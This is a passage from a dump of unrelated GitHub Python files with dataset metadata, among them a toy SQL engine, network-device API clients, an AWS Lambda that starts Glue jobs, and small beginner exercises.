==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n print(r)\n self.table.table[0][col_num]=sum(r)\n \n def dominoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]=min(r)\n\n def doavgoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]= sum(r) / len(r) \n\n def docountoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]= len(r)\n\n def docountontable(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = len(row[col_num]) \n\n def domaxontable(self , col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = max(row[col_num])\n\n def dominontable(self , col_name):\n col_num = -1\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = min(row[col_num])\n\n def doavgontable(self,col_name):\n \n col_num = 0\n for i in 
range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = sum(row[col_num]) / len(row[col_num]) \n\n def dosumontable(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = sum(row[col_num])\n\n def groupbyQuery(self):\n\n if len(self.groupbylist)==0:\n return\n table_3=[]\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if self.groupbylist[0] == self.table.cols_names[i]:\n col_num=i\n break\n \n for i in range (0,len(self.table.table)):\n \n \n row1 = self.table.table[i]\n \n\n \n gbv = row1[col_num]\n ispresent = False\n for j in range (0,len(table_3)):\n row2 = table_3[j]\n \n if int(gbv) in row2[col_num] :\n \n for p in range (0,len(row1)):\n if p==col_num:\n continue\n else:\n table_3[j][p].append(int(row1[p]))\n\n \n \n ispresent = True\n break\n\n if not ispresent:\n finallist =[]\n for q in range (0,len(row1)):\n finallist.append([int(row1[q])])\n table_3.append(finallist)\n\n self.table.table = table_3\n \n\n def convertlisttoval(self):\n for row in self.table.table:\n for i in range (0,len(row)):\n if type(row[i])==list and len(row[i])==1:\n row[i] = row[i][0]\n\n \n\n\n def show_sanitiized_table(self): \n flag = False\n distinct = 0\n \n\n for i in range (0,len(self.selectlist)):\n \n if self.selectlist[i] == \"MAX\":\n flag=True\n self.show_columns.append(\"max(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"MIN\":\n flag=True\n self.show_columns.append(\"min(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"AVG\":\n flag=True\n self.show_columns.append(\"avg(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"SUM\":\n flag=True\n self.show_columns.append(\"sum(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"COUNT\":\n flag=True\n self.show_columns.append(\"count(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"DISTINCT\":\n distinct=1\n \n else:\n if flag:\n flag=0\n else:\n self.show_columns.append(self.selectlist[i])\n \n \n print (\"show_columns\")\n print(self.show_columns)\n showcols=[]\n for i in range (0,len(self.selectlist)):\n if self.selectlist[i] in self.table.cols_names :\n for j in range (0,len(self.table.cols_names)):\n if self.selectlist[i] == self.table.cols_names[j]:\n showcols.append(j)\n \n\n #print(self.show_columns)\n finaltable = []\n tempo = []\n for row in self.table.table:\n col = []\n for index in showcols:\n col.append(row[index])\n #print(row[index],end = \" \")\n finaltable.append(col)\n #print(\" \")\n \n if distinct==1:\n for row in finaltable:\n if row not in tempo:\n print(row)\n tempo.append(row)\n else:\n for row in finaltable:\n print(row)\n \n\n\n \n \n def getorderbycolumn(self,col_name):\n ordervy = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name == self.table.cols_names[i]:\n ordervy = i\n self.orderbycolumn=i\n print(\"order by col is \"+str(i))\n return \n \n def orderbyQuery(self):\n if len(self.orderbylist)==0:\n return \n\n self.getorderbycolumn(self.orderbylist[0])\n self.table.table.sort(key=self.takeSome)\n #self.table.table.sort(key=lambda x:x.split()[ordervy]\n \"\"\"\n for row in self.table.table:\n print(row)\n \"\"\"\n #\n def takeSome(self,elem):\n #print(elem)\n return elem[self.orderbycolumn]\n \n def resolveWhereQuery(self, operator_type, col1, col2):\n 
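        # Filters self.table.table rows on a single comparison. operator_type is
        # the code produced by get_operator(): 0 '=', 1 '>', 2 '>=', 3 '<', 4 '<='.
        # col1/col2 are each either a column name (str) or an int literal, which
        # selects one of the three branches below: column-vs-literal,
        # literal-vs-column, column-vs-column.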
tablefinal = []\n if type(col1) == str and type(col2) == int:\n\n col_num = 0\n for i in range(0, len(self.table.cols_names)):\n if self.table.cols_names[i] == col1:\n col_num = i\n break\n \n if operator_type == 2:\n for row in self.table.table:\n if int(row[col_num]) >= col2:\n tablefinal.append(row)\n\n if operator_type == 3:\n for row in self.table.table:\n if int(row[col_num]) < col2:\n tablefinal.append(row)\n\n if operator_type == 4:\n for row in self.table.table:\n if int(row[col_num]) <= col2:\n tablefinal.append(row)\n\n if operator_type == 0:\n for row in self.table.table:\n if int(row[col_num]) == col2:\n tablefinal.append(row)\n\n if operator_type == 1:\n for row in self.table.table:\n if int(row[col_num]) > col2:\n tablefinal.append(row)\n\n if type(col2) == str and type(col1) == int:\n\n for i in range(0, len(self.table.cols_names)):\n if self.table.cols_names[i] == col2:\n col_num = i\n\n if operator_type == 2:\n for row in self.table.table:\n if col1 >= int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 3:\n for row in self.table.table:\n if col1 < int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 4:\n for row in self.table.table:\n if col1 <= int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 0:\n for row in self.table.table:\n if col1 == int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 1:\n for row in self.table.table:\n if col1 > int(row[col_num]):\n tablefinal.append(row)\n\n if type(col2) == str and type(col1) == str:\n cols = []\n for i in range(0, len(self.table.cols_names)):\n if self.table.cols_names[i] == col2 or self.table.cols_names[i] == col1:\n cols.append(i)\n column1 = cols[0]\n column2 = cols[1]\n\n if operator_type == 2:\n for row in self.table.table:\n if int(row[column1]) >= int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 3:\n for row in self.table.table:\n if int(row[column1]) < int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 4:\n for row in self.table.table:\n if int(row[column1]) <= int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 0:\n for row in self.table.table:\n if int(row[column1]) == int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 1:\n for row in self.table.table:\n if int(row[column1]) > int(row[column2]):\n tablefinal.append(row)\n\n return tablefinal\n\n\n\nabc = \"Select SUM(A),MAX(E) FROM table1,table2 GROUP BY B;\"\nmydb = Database(\"metadata.txt\")\nqueryt = Query(abc, mydb)\n\nqueryt.parse_query()\nqueryt.executQuery()\n\n\n#db=Database(\"metadata.txt\")\n","repo_name":"mastermystery007/mini-sql-engine","sub_path":"finalengine.py","file_name":"finalengine.py","file_ext":"py","file_size_in_byte":25545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"13024763602","text":"from __future__ import annotations\n\nimport abc\nfrom dataclasses import dataclass\nfrom enum import IntEnum\n\nfrom typing_extensions import reveal_type\n\n\nclass CodeInContext1(IntEnum):\n FAIL_TO_DO_SOMETHING = 1\n DISCONNECTED_FROM_SOMEWHERE = 2\n BAD_PASSWORD = 3\n BAD_PRIVATE_KEY = 4\n\n\nclass ErrorInContext1(Exception):\n def __init__(self, code: CodeInContext1, msg: str = \"\") -> None:\n self.code = code\n self.msg = msg\n super().__init__(msg)\n\n\nclass FailToDoSomethingError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.FAIL_TO_DO_SOMETHING, msg)\n\n\nclass 
DisconnectedFromSomewhereError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.DISCONNECTED_FROM_SOMEWHERE, msg)\n\n\nclass BadPasswordError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.BAD_PASSWORD, msg)\n\n\nclass BadPrivateKeyError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.BAD_PRIVATE_KEY, msg)\n\n\nclass Context1Adapter(metaclass=abc.ABCMeta):\n def do_something(self) -> str:\n raise NotImplementedError\n\n\nclass CodeInContext2(IntEnum):\n FAIL_TO_DO_SOMETHING_ELSE = 1\n DISCONNECTED_FROM_SOMEWHERE_ELSE = 2\n\n\nclass ErrorInContext2(Exception):\n def __init__(self, code: CodeInContext2, msg: str = \"\") -> None:\n self.code = code\n self.msg = msg\n super().__init__(msg)\n\n\nclass FailToDoSomethingElseError(ErrorInContext2):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext2.FAIL_TO_DO_SOMETHING_ELSE, msg)\n\n\nclass DisconnectedFromSomewhereElseError(ErrorInContext2):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext2.DISCONNECTED_FROM_SOMEWHERE_ELSE, msg)\n\n\nclass Context2Adapter(metaclass=abc.ABCMeta):\n def do_something_else(self, input_value: str) -> int:\n raise NotImplementedError\n\n\nclass DomainCode(IntEnum):\n RETRY_LATER = 0\n NOT_ENOUGH_MONEY = 1\n NOT_OLD_ENOUGH = 2\n NOT_ALLOWED = 3\n INTERNAL_ERROR = 4\n\n\nclass DomainError(Exception):\n def __init__(self, code: DomainCode, msg: str = \"\") -> None:\n self.code = code\n self.msg = msg\n\n\ndef some_condition(value: int) -> bool:\n return value > 18\n\n\n@dataclass\nclass DomainService:\n adapter_1: Context1Adapter\n adapter_2: Context2Adapter\n\n def do_action(self):\n try:\n string_value = self.adapter_1.do_something()\n except FailToDoSomethingError as exc:\n raise DomainError(DomainCode.RETRY_LATER) from exc\n except DisconnectedFromSomewhereError as exc:\n raise DomainError(DomainCode.RETRY_LATER) from exc\n except (BadPasswordError, BadPrivateKeyError) as exc:\n raise DomainError(DomainCode.NOT_ALLOWED) from exc\n except ErrorInContext1 as exc:\n raise DomainError(DomainCode.INTERNAL_ERROR, \"unknown error\") from exc\n\n try:\n result = self.adapter_2.do_something_else(string_value)\n except FailToDoSomethingElseError as exc:\n raise DomainError(DomainCode.INTERNAL_ERROR) from exc\n except DisconnectedFromSomewhereElseError as exc:\n raise DomainError(DomainCode.RETRY_LATER) from exc\n except ErrorInContext2 as exc:\n raise DomainError(DomainCode.INTERNAL_ERROR) from exc\n\n if not some_condition(result):\n raise DomainError(DomainCode.NOT_OLD_ENOUGH)\n return result\n\n\n@dataclass\nclass Usecase:\n service: DomainService\n\n def execute(self):\n result = self.service.do_action()\n return result\n\n\ndef main(adapter1: Context1Adapter, adapter2: Context2Adapter):\n service = DomainService(adapter1, adapter2)\n result = Usecase(service).execute()\n reveal_type(result)\n","repo_name":"charbonnierg/fp-playground","sub_path":"examples/error_types/custom_errors_with_exceptions__wc.py","file_name":"custom_errors_with_exceptions__wc.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"32659498550","text":"import time\n\n#Variables to be put into the madlibs\nadj_list = input(\"Gimme 3 adjectives seperated by a space : \").split()\nadj1 = adj_list[0]\nadj2 = adj_list[1]\nadj3 = 
adj_list[2]\nadj_list = input(\"Great, now gimme 3 verbs separated by a space : \").split()\nverb1 = adj_list[0]\nverb2 = adj_list[1]\nverb3 = adj_list[2]\nnoun1 = input(\"now all that's left is one noun :D : \")\n\n\nmadlib = f\"Computer programming is so {adj1}! It makes me so {adj2} to always feel \\nlike I am gonna {verb1}.\" \\\n         f\"I like people that are {adj3} and have some {noun1}. \\nUnfortunately I {verb2} as I want to {verb3} right now.\"\n\n\nprint(\"processing\")\ntime.sleep(2)\nprint(\"tada\")\ntime.sleep(1)\nprint(madlib)","repo_name":"paul-coder-646/Learning_Python-","sub_path":"Kylie/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74961434417","text":"from interfaces import IAgent\nimport pygame\nimport copy\nimport numpy as np\n\n\nclass Trainer(object):\n    def __init__(self, agent1 : IAgent, agent2 : IAgent, gameFunction, epsilon=0.1, playSeed=0, trainSeed=0):\n        self.agent1 = agent1\n        self.agent2 = agent2\n        self.gameFunction = gameFunction\n        self.epsilon = epsilon\n        self.playSeed = playSeed\n        self.trainSeed = trainSeed\n        self.resolution = (1920, 1080)\n        self.recentOutcomes = None\n\n    def run(self, numPlays, numTrains, numRepeatGames, verbose=False, visualise=False):\n        print(\"Starting full run: {0} test games, {1} training games, {0} test games\".format(numPlays, numTrains))\n        self.play(numPlays, verbose, visualise)\n        if verbose:\n            p1Wins, p2Wins, draw = self.countOutcomes()\n            print(\"Player 1: {} | Player 2: {} | Draws: {}\".format(p1Wins, p2Wins, draw))\n        print(\"Finished {} test games\".format(numPlays))\n\n        self.train(numTrains, numRepeatGames, verbose)\n        print(\"Finished {} training games\".format(numTrains))\n\n        self.play(numPlays, verbose, visualise)\n        if verbose:\n            p1Wins, p2Wins, draw = self.countOutcomes()\n            print(\"Player 1: {} | Player 2: {} | Draws: {}\".format(p1Wins, p2Wins, draw))\n        print(\"Finished {} test games\".format(numPlays))\n\n    def train(self, numGames, numRepeatGames, verbose):\n        np.random.seed(self.trainSeed)\n        interval = numGames / 100\n\n        for x in range(numGames):\n            if x % numRepeatGames == 0:\n                startGame = self.gameFunction()\n            game = copy.deepcopy(startGame)\n\n            while not game.gameEnded():\n                if game.getTurn() == 1:\n                    makeMove(self.agent1, game, 1, self.epsilon)\n                else:\n                    makeMove(self.agent2, game, 2, self.epsilon)\n\n            self.agent1.finalize(game)\n            self.agent2.finalize(game)\n\n            if verbose and x % interval == 0:\n                print(\"\\rTrained %s/%s games - Agent 1: %s - Agent 2: %s\" % (x, numGames, self.agent1.getInfo(), self.agent2.getInfo()), end=\"\")\n        if verbose:\n            print()\n\n    def play(self, numGames, verbose=False, visualise=False):\n        np.random.seed(self.playSeed)\n        self.recentOutcomes = []\n        interval = numGames / 100\n        draw = True\n\n        if visualise:\n            pygame.init()\n            pygame.display.set_mode(self.resolution)\n            surface = pygame.display.get_surface()\n\n        for x in range(numGames):\n            game = self.gameFunction()\n\n            if visualise:\n                p1Wins, p2Wins, draws = self.countOutcomes()\n                pygame.display.set_caption(\"Player 1: {} | Player 2: {} | Draws: {}\".format(p1Wins, p2Wins, draws))\n\n            while not game.gameEnded():\n                if visualise:\n                    if draw:\n                        game.draw(surface)\n                        pygame.display.flip()\n\n                    for event in pygame.event.get():\n                        if event.type == pygame.QUIT:\n                            pygame.quit()\n                            return\n                        elif event.type == pygame.KEYDOWN:\n                            if event.key == pygame.K_t:\n                                draw = not draw\n                            elif event.key == pygame.K_q:\n                                pygame.quit()\n                                return\n\n                
if game.getTurn() == 1:\n game.makeMove(1, self.agent1.getTrainedMove(game))\n else:\n game.makeMove(2, self.agent2.getTrainedMove(game))\n self.recentOutcomes.append(game.getWinner())\n\n if verbose and x % interval == 0:\n print(\"\\rPlayed %s/%s games\" % (x + 1, numGames), end=\"\")\n if verbose:\n print()\n\n if visualise:\n pygame.quit()\n\n def countOutcomes(self):\n p1Wins = len([g for g in self.recentOutcomes if g == 1])\n p2Wins = len([g for g in self.recentOutcomes if g == 2])\n draws = len([g for g in self.recentOutcomes if g == -1])\n return p1Wins, p2Wins, draws\n\n\ndef makeMove(agent: IAgent, game, player, epsilon):\n action = agent.getMove(game)\n if np.random.rand() < epsilon:\n actions = game.getActions(player)\n action = actions[np.random.randint(len(actions))]\n agent.s = None\n game.makeMove(player, action)\n","repo_name":"hrjakobsen/MIProject","sub_path":"project/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"33314411268","text":"__author__ = 'Michele Johnson'\r\n# Program Requirements\r\n# A group of high school students are selling pizza and soda during a basketball game to raise fund for a field trip. \r\n# Pizza is $3.50 per slice and soda is $1.25 per cup. Design a program to do the following. \r\n# Ask the user to enter number of cups of soda and number of slices of pizza ordered by the customer. \r\n# The program will calculate and display the total amount due from the customer.\r\n\r\n# Get input from user\r\nNum_Cups = int(input('Enter the number of cups of drink ordered: '))\r\nNum_Slice = int(input('Enter the number of slices of ordered: '))\r\n\r\n# Calculations\r\nSoda_Prc = Num_Cups * 1.25\r\nPizza_Prc = Num_Slice * 3.50\r\nTot_Amt = Soda_Prc + Pizza_Prc\r\n\r\n# Output\r\nprint('\\nDrink total:\\t\\t$' + (format(Soda_Prc, ',.2f')))\r\nprint('Pizza slices total:\\t$' + (format(Pizza_Prc, ',.2f')))\r\nprint('\\nOrder total:\\t\\t$' + (format(Tot_Amt, ',.2f')))\r\n","repo_name":"mischelay2001/WTCSC121","sub_path":"CSC121Lab01_Lab08_Misc/CSC121Lab2Problem4_PizzaSoda.py","file_name":"CSC121Lab2Problem4_PizzaSoda.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"2024815471","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport requests\nfrom abc import ABC\nfrom netests.workers.device_api import DeviceAPI\nfrom netests.converters.facts.extreme_vsp.api import (\n _extreme_vsp_facts_api_converter\n)\nfrom netests.converters.lldp.extreme_vsp.api import (\n _extreme_vsp_lldp_api_converter\n)\nfrom netests.constants import FACTS_DATA_HOST_KEY, LLDP_DATA_HOST_KEY\nfrom netests.exceptions.netests_exceptions import NetestsFunctionNotPossible\n\n\nclass ExtremeVSPAPI(DeviceAPI, ABC):\n\n def __init__(\n self,\n task,\n commands,\n vrf_loop,\n converter,\n key_store,\n options={},\n ):\n super().__init__(\n task,\n commands,\n vrf_loop,\n converter,\n key_store,\n options\n )\n\n def exec_call(self, task, command, vrf):\n protocol = self.use_https(task.host.get('secure_api', True))\n login = requests.post(\n url=(\n f\"{protocol}://{task.host.hostname}:{task.host.port}\"\n \"/auth/token/\"\n ),\n headers={\n 'Content-Type': 'application/json',\n },\n data=\"\"\"\n {\n \"username\": \"%s\",\n \"password\": \"%s\"\n }\n \"\"\" % (task.host.username, task.host.password)\n )\n auth_token = 
json.loads(login.content).get('token')\n\n data = requests.get(\n url=(\n f\"{protocol}://{task.host.hostname}:{task.host.port}\"\n f\"/rest/restconf/data/{command}\"\n ),\n headers={\n 'X-Auth-Token': auth_token,\n }\n )\n\n self.check_status_code(data.status_code)\n return data.content\n\n\nclass BGPExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - BGP - API - Not Possible\"\n )\n\n\nclass CDPExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - CDP - API - Not Possible\"\n )\n\n\nclass FactsExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n super().__init__(\n task=task,\n commands={\n \"default_vrf\": {\n \"get_infos_sys\": \"openconfig-system:system\",\n \"get_infos_int\": \"openconfig-interfaces:interfaces\"\n }\n },\n vrf_loop=False,\n converter=_extreme_vsp_facts_api_converter,\n key_store=FACTS_DATA_HOST_KEY,\n options=options\n )\n\n\nclass LLDPExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n super().__init__(\n task=task,\n commands={\n \"default_vrf\": {\n \"no_key\": \"openconfig-lldp:lldp/interfaces\"\n }\n },\n vrf_loop=False,\n converter=_extreme_vsp_lldp_api_converter,\n key_store=LLDP_DATA_HOST_KEY,\n options=options\n )\n\n\nclass OSPFExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - OSPF - API - Not Possible\"\n )\n\n\nclass VRFExtremeVSPAPI(ExtremeVSPAPI):\n\n def __init__(self, task, options={}):\n raise NetestsFunctionNotPossible(\n \"Extreme_VSP - VRF - API - Not Possible\"\n )\n","repo_name":"Netests/netests","sub_path":"netests/workers/extreme_vsp_api.py","file_name":"extreme_vsp_api.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"57"} +{"seq_id":"72513233457","text":"a, b = map(int, input().split())\r\nAns=0\r\ncnt = 0\r\nfor i in range(a, b + 1):\r\n temp=1\r\n while temp<=i:\r\n if i%temp==0:\r\n cnt=temp\r\n temp*=2\r\n Ans+=cnt\r\nprint(Ans)","repo_name":"tigre911/Algorithm","sub_path":"Python/AO_school/BOJ_1407_2로 몇 번 나누어질까.py","file_name":"BOJ_1407_2로 몇 번 나누어질까.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41247525300","text":"\"\"\"\nYou are given a two-dimensional matrix, grid, containing only ones and zeroes where zeroes represent\nland and ones represent water. An “island” is a group of one or more contiguous zeroes connected\nfour-directionally (i.e. up, down, left and right). A magical island is an island that is completely\nsurrounded by water on all sides four-directionally. 
Return the total number of magical islands in\nthe grid.\n\nEx: Given the following grid…\n\ngrid = [\n    [1, 1, 1],\n    [1, 0, 1],\n    [1, 1, 1]\n], return 1.\nEx: Given the following grid…\n\ngrid = [\n    [1, 1, 1, 0],\n    [1, 0, 1, 0],\n    [1, 1, 1, 0]\n], return 1 (the island in the right-most column is not entirely surrounded by water to\nits right for example).\n\"\"\"\n\n\nclass Solution:\n    def numMagicalIslands(self, grid):\n        # Time O(m*n) Space O(m*n). Zeroes are land; dfs sinks one land region\n        # by marking it as water (1).\n        def dfs(i, j):\n            if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]) or grid[i][j]:\n                return\n            grid[i][j] = 1\n            dfs(i + 1, j)\n            dfs(i - 1, j)\n            dfs(i, j + 1)\n            dfs(i, j - 1)\n\n        # Islands touching the border are not fully surrounded by water, so sink\n        # them first; only interior islands can be magical.\n        for i in range(len(grid)):\n            for j in range(len(grid[0])):\n                if (i in (0, len(grid) - 1) or j in (0, len(grid[0]) - 1)) and not grid[i][j]:\n                    dfs(i, j)\n\n        # Every remaining island is surrounded four-directionally by water.\n        count = 0\n        for i in range(len(grid)):\n            for j in range(len(grid[0])):\n                if not grid[i][j]:\n                    dfs(i, j)\n                    count += 1\n        return count\n\n\n# Test Cases\nif __name__ == \"__main__\":\n    solution = Solution()\n    grid = [[1, 1, 1], [1, 0, 1], [1, 1, 1]]\n    print(solution.numMagicalIslands(grid))  # 1\n    grid = [[1, 1, 1, 0], [1, 0, 1, 0], [1, 1, 1, 0]]\n    print(solution.numMagicalIslands(grid))  # 1\n","repo_name":"vishrutkmr7/DailyPracticeProblemsDIP","sub_path":"2023/04 April/db04262023.py","file_name":"db04262023.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"40737353351","text":"import json\nimport boto3\n\n\ndef lambda_handler(event, context):\n    '''\n    Extract, from the S3 upload event, the key of the uploaded object and the bucket it landed in\n    '''\n    print(event)\n    message_body = json.loads(event['Records'][0]['body'])\n    print(message_body)\n    file_name = message_body['Records'][0]['s3']['object']['key'] # Take the file name together with its path\n    bucketName = message_body['Records'][0]['s3']['bucket']['name'] # Take the bucket name\n\n    file_name = file_name.replace(\"+(1)\", \"\") # strip the \"+(1)\" from the file name\n    print(\"File Name : \",file_name)\n    print(\"Bucket Name : \",bucketName)\n    glue = boto3.client('glue',\n                    aws_access_key_id='<AWS_ACCESS_KEY_ID>',  # hard-coded credentials redacted; prefer an IAM role\n                    aws_secret_access_key='<AWS_SECRET_ACCESS_KEY>',\n                    region_name='us-east-1')\n    \n    if \"metadata\" in file_name: # If it comes from the metadata bucket, start the metadata ETL job\n        response = glue.start_job_run(JobName=\"etl-raw-metadata\", Arguments={\"--VAL1\":file_name,\"--VAL2\":bucketName})\n        print(\"Lambda Invoke \")\n    else: # If it comes from the reviews bucket, start the reviews ETL job\n        response = glue.start_job_run(JobName=\"etl-raw-reviews\", Arguments={\"--VAL1\":file_name,\"--VAL2\":bucketName})\n        print(\"Lambda Invoke \")","repo_name":"marybet/Proyecto-Grupal-Data-Science","sub_path":"arquitectura aws/lambdas/lambda-raw-metadata-ml .py","file_name":"lambda-raw-metadata-ml .py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"20806685988","text":"import sys\n\nwhile 1:\n    a = sys.stdin.readline().strip()\n    lst = list(map(int, a.split()))\n    if a == '0 0 0':\n        break \n    lst.sort()\n    if lst[2] ** 2 == lst[0] ** 2 + lst[1] ** 2:\n        print('right')\n    else:\n        print('wrong')\n","repo_name":"Ulost123/algorithm","sub_path":"class2/4153.py","file_name":"4153.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16158559665","text":"\"\"\" original author: Armen Aghajanyan \"\"\"\nfrom copy import deepcopy\nfrom operator import index\nfrom os import remove\nimport astunparse\nimport 
ast\nimport libcst as cst\nfrom typing import Optional\nimport re\n\narrow_re = re.compile(\"\\s*->\\s*\")\n\nclass TypeHintKeepOnlyTargetedFormatPreserving(cst.CSTTransformer):\n # based on https://stackoverflow.com/questions/42733877/remove-type-hints-in-python-source-programmatically\n def __init__(self, arg_types, matching_function, remove_type_imports=False):\n # remove_type_imports is False to match TypeWriter paper\n for arg_type in arg_types:\n assert arg_type in ['return', 'argument']\n self.arg_types = arg_types\n self.remove_type_imports = remove_type_imports\n if remove_type_imports:\n raise NotImplementedError()\n self.matching_function = matching_function\n self.imports = []\n self.matches = []\n\n def leave_FunctionDef(self, node, updated_node):\n if 'return' in self.arg_types and node.returns is not None and self.matching_function(function=node, returns=node.returns):\n is_target = True\n else:\n is_target = False\n updated_node = updated_node.deep_remove(updated_node.returns)\n\n if node.params.params:\n args = []\n for arg in node.params.params:\n if 'argument' in self.arg_types and arg is not None and self.matching_function(function=node, arg=arg):\n self.matches.append({'node': node, 'arg': arg})\n else:\n arg = arg.deep_remove(arg.annotation)\n args.append(arg)\n updated_node = updated_node.with_changes(params=node.params.with_changes(params=args))\n\n if is_target:\n self.matches.append({'original_node': node, 'node': updated_node, 'returns': updated_node.returns})\n return updated_node\n\n def leave_AnnAssign(self, node, updated_node):\n new_node = cst.Assign([cst.AssignTarget(\n target=updated_node.target,\n whitespace_before_equal=cst.SimpleWhitespace(' '),\n whitespace_after_equal=cst.SimpleWhitespace(' '),\n )], updated_node.value)\n return new_node\n\n def leave_Import(self, node, updated_node):\n self.imports.append(node)\n return updated_node\n\n def leave_ImportFrom(self, node, updated_node):\n self.imports.append(node)\n return updated_node\n\nclass TypeHintKeepOnlyTargeted(ast.NodeTransformer):\n # based on https://stackoverflow.com/questions/42733877/remove-type-hints-in-python-source-programmatically\n def __init__(self, arg_types, matching_function, remove_type_imports=False):\n # remove_type_imports is False to match TypeWriter paper\n for arg_type in arg_types:\n assert arg_type in ['return', 'argument']\n self.arg_types = arg_types\n self.remove_type_imports = remove_type_imports\n self.matching_function = matching_function\n self.imports = []\n self.matches = []\n\n def visit_FunctionDef(self, node):\n if 'return' in self.arg_types and node.returns is not None and self.matching_function(function=node, returns=node.returns):\n self.matches.append({'node': node, 'returns': node.returns})\n else:\n node.returns = None\n\n if node.args.args:\n for arg in node.args.args:\n if 'argument' in self.arg_types and arg is not None and self.matching_function(function=node, arg=arg):\n self.matches.append({'node': node, 'arg': arg})\n else:\n arg.annotation = None\n self.generic_visit(node)\n return node\n\n def visit_AnnAssign(self, node):\n if node.value is None:\n return None\n return ast.Assign([node.target], node.value)\n\n def visit_Import(self, node):\n self.imports.append(node)\n if self.remove_type_imports:\n node.names = [n for n in node.names if n.name != 'typing']\n return node if node.names else None\n return node\n\n def visit_ImportFrom(self, node):\n self.imports.append(node)\n if self.remove_type_imports and node.module == 'typing':\n return 
